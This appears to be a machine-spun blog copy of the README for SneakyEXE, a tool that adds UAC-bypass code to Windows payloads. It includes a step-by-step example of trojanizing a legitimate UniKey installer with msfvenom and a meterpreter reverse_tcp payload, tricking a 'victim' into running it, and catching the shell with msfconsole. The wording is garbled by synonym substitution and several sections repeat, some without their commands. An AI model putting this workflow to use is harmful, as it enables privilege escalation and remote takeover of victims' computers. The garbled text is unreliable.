About SneakyEXE
SneakyEXE is a tool which helps yous embedding a UAC-Bypassing component subdivision into your custom Win32 payloads (x86_64 architecture specifically).
SneakyEXE was tested on:
- Windows 7, 8, x (64 bit)
- Parrot Security OS 4.7
Requirements of SneakyEXE:
- For Linux: Architecture: Optional
Python 3.7.x: Yes
Module: termcolor
Distro: Any
Distro version: Any - For Windows: Architecture: x86_64
Python 3.7.x: No
Module: No
Windows version: 7, 8, 10
SneakyEXE's Installtion for Linux
You must install Python three first:
- For Debian-based distros:
sudo apt install python3
- For Arch Linux based distros:
sudo pacman -S python3
And then, opened upwards your Terminal in addition to operate into these commands:
SneakyEXE's Installtion for Windows
- Download SneakEXE-master zip file.
- Unzip it into your optional directory.
- Change dir to
\SneakyEXE\Win32\
. - Execute
sneakyexe.exe
(orsys\sneakyexe.exe
for an improved startup speed). - (Optional : yous tin bathroom re-create
sneakyexe.exe
to whatever directory yous desire in addition to delete the unzipped one)
NOTE: The payload tin bathroom solely last successfully executed yesteryear the user alongside Administrator privilege. Users alongside express token wouldn't succeed.
SneakyEXE GUI verion installation for Windows
You must install Python three first. Download in addition to run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download SneakEXE-master zip file in addition to unzip it.
And then, opened upwards PowerShell or CMD on SneakyEXE folder where yous bring only unzipped SneakyEXE-master in addition to operate into these command:
How to job SneakyEXE?
Example:
I dowloaded Unikey from Unikey.org.
And then, i used
After that, to embed UAC-Bypassing codes to
And then, yesteryear roughly how, makes your victim installs the payload that was embedded UAC-Bypassing codes in addition to operate into these commands:
and wait...
Disclaimer:
SneakyEXE GUI verion installation for Windows
You must install Python three first. Download in addition to run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download SneakEXE-master zip file in addition to unzip it.
And then, opened upwards PowerShell or CMD on SneakyEXE folder where yous bring only unzipped SneakyEXE-master in addition to operate into these command:
pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe
How to job SneakyEXE?
Example:
I dowloaded Unikey from Unikey.org.
And then, i used
msfvenom
to inject payload to UniKeyNT.exe
(payload used: windows/meterpreter/reverse_tcp
). I called the payload file is uNiKeY.exe
.After that, to embed UAC-Bypassing codes to
uNiKeY.exe
, i used this command:python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE
And then, yesteryear roughly how, makes your victim installs the payload that was embedded UAC-Bypassing codes in addition to operate into these commands:
sudo msfconsole -q
job multi/handler
laid upwards payload windows/meterpreter/reverse_tcp
laid upwards LHOST <Your IP address>
laid upwards LHOST <Your port>
exploit
and wait...
Disclaimer:
- This tool was made for academic purposes or ethical cases only. I ain't taking whatever resposibility upon your actions if yous abuse this tool for whatever black-hat acitivity
- Feel gratuitous to job this projection inwards your software, only don't reclaim the ownerhsip.
Credits: This tool does embed UACme which was originally coded yesteryear hfiref0x but the balance was pretty much all coded yesteryear me (Zenix Blurryface).
Author: Copyright © 2019 yesteryear Zenix Blurryface.
0 comments:
Post a Comment